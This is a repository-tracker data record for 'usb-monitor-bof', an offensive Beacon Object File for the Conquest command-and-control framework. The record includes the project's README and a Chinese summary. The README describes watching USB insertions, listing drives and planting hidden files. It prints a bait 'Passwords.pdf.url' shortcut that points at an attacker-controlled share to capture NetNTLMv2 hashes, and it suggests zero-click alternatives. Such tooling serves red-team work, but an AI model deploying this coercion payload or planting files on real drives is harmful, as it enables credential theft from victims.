[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-80566":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":12,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":14,"stars7d":15,"stars30d":15,"stars90d":14,"forks30d":14,"starsTrendScore":14,"compositeScore":16,"rankGlobal":10,"rankLanguage":10,"license":17,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":10,"pushedAt":10,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},80566,"usb-monitor-bof","jakobfriedl\u002Fusb-monitor-bof","jakobfriedl","Async BOF that monitors USB device connect\u002Fdisconnect events, reports device information and performs actions on connected USB storage volumes.","",null,"C",55,6,0,1,43.14,"BSD 3-Clause \"New\" or \"Revised\" License",false,"main",true,[],"2026-06-12 04:01:29","# USB Monitor\n\nAsync BOF that monitors USB device connect\u002Fdisconnect events and reports device information. When a USB drive is connected, it can list directory contents, upload arbitrary files, or place a malicious `.url` file to capture NetNTLMv2 hashes via forced authentication.\n\n>[!Important]\n> This BOF requires asynchronous object file loading capabilities to work without blocking the agent. Such functionality is provided by the [Conquest](https:\u002F\u002Fgithub.com\u002Fjakobfriedl\u002Fconquest\u002F) framework.\n\n## How it works \n\nThe BOF registers two separate `CM_Register_Notification` callbacks via `cfgmgr32`:\n\n1. **USB Device callback** (`USB_DEVICE_GUID`): fires on any USB device arrival\u002Fremoval. Parses `VID`\u002F`PID` from the symbolic link path, retrieves the human-readable device description from the registry via `CM_Get_DevNode_Registry_PropertyW`, and prints device info to the beacon.\n\n2. **USB Volume callback** (`VOLUME_GUID`) :fires only when a USB storage volume is mounted. Resolves the drive letter by matching `QueryDosDeviceW` targets, retrieves the volume label via `GetVolumeInformationA`, then executes the configured actions (bitmask):\n - `ACTION_LIST (0x01)`: Lists contents of the USB drive root directory.\n - `ACTION_PUT (0x02)`: writes the provided file to the USB drive root directory. When a file with the same name exists, it will **not** be overwritten. Optionally sets `FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM` when `--hidden` is passed.\n\nThe agent is woken up from sleep using `BeaconWakeup` whenever a callback is triggered. \n\n## Usage\n\nThe object file takes the following arguments: \n\n| Name | Type | Description | \n| --- | --- | --- | \n| `action` | `int` | Bitmask of actions to execute when a USB drive is mounted.\u003Cbr>- `NONE (0x00)`: monitor only\u003Cbr>- `LIST (0x01)`: enumerate drive root\u003Cbr>- `PUT (0x02)`: write file to drive root\u003Cbr>Flags can be combined (e.g. `0x03` for both listing files and uploading one) | \n| `filename` | `string` | Only used by the `PUT` action. Destination filename on the USB drive. Defaults to the source file's basename, or `Passwords.pdf.url` for the coerce shortcut. | \n| `filecontents` | `bytes` | Only used by the `PUT` action. Raw bytes of the file to write to the USB drive. | \n| `hidden` | `int` | Only used by the `PUT` action. When set to `1`, sets `FILE_ATTRIBUTE_HIDDEN \\| FILE_ATTRIBUTE_SYSTEM` on the written file, hiding it from Explorer. | \n\nThe repository contains a [Conquest Module](.\u002Fdist\u002Fusb-monitor.py) which simplifies the use of the `usb-monitor` async BOF. \n\n```\nUsage: usb-monitor [--list] [--put file] [--coerce] [--target target] [--name name] [--hidden]\nExample: usb-monitor\n\nOptional arguments:\n --list BOOL List files and directories on the connected USB drive.\n --put file STRING Path to the file to upload to the connected USB drive.\n --coerce BOOL Upload a malicious .url file to force NTLM authentication to an attacker-controlled system (requires user interaction).\n Requires --target.\n --target target STRING Hostname or IP address of attacker-controlled system for coercion.\n --name name STRING Name of the uploaded file.\n --hidden BOOL Hide the uploaded file on the USB drive.\n```\n\n\nNote that this module includes the `--coerce` flag. This is a wrapper for the `PUT` action that creates and uploads a malicious `.url` file to the root of the connected USB drive. When this option is set, the `--target` flag is required. The uploaded file has the name `Passwords.pdf.url` by default and the following contents:\n\n```bash\n[InternetShortcut]\nURL=file:\u002F\u002F\u003Ctarget>\u002Fshare\nIconFile=C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe \nIconIndex=11\n```\n\nWhen a victim opens the URL file, a request is made to an attacker-controlled system which leaks the NetNTLMv2 hash for cracking or relaying. \n\n\n> [!Caution]\n> The URL coercion file is not designed to be stealthy and will raise suspicion when clicked, as it notifies the victim that the destination `\\\\\u003Ctarget>\\share` could not be reached. Consider using zero-click forced authentication exploits that trigger the hash leak automatically when the file explorer opens the USB drive instead of this proof-of-concept. \n\n![USB monitor](.\u002Fassets\u002Fusb-monitor.png)\n\n## Installation\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Fjakobfriedl\u002Fusb-monitor-bof\ncd usb-monitor-bof\nmake\n```\n\nFrom there, use Conquest's Script Manager to load the `dist\u002Fusb-monitor.py` module.\n","该项目是一个异步加载的BOF(Beacon Object File),用于监控USB设备的连接和断开事件,并报告设备信息。当USB驱动器连接时,它可以列出目录内容、上传任意文件或放置一个恶意的`.url`文件以通过强制身份验证捕获NetNTLMv2哈希。核心功能包括使用`CM_Register_Notification`回调来监听USB设备和存储卷的变化,并执行预定义的操作如文件列表显示与上传。此项目适用于需要对USB设备进行实时监控并自动响应特定事件的安全测试场景。需要注意的是,该BOF依赖于Conquest框架提供的异步对象文件加载能力才能正常工作。",2,"2026-06-11 04:01:15","CREATED_QUERY"]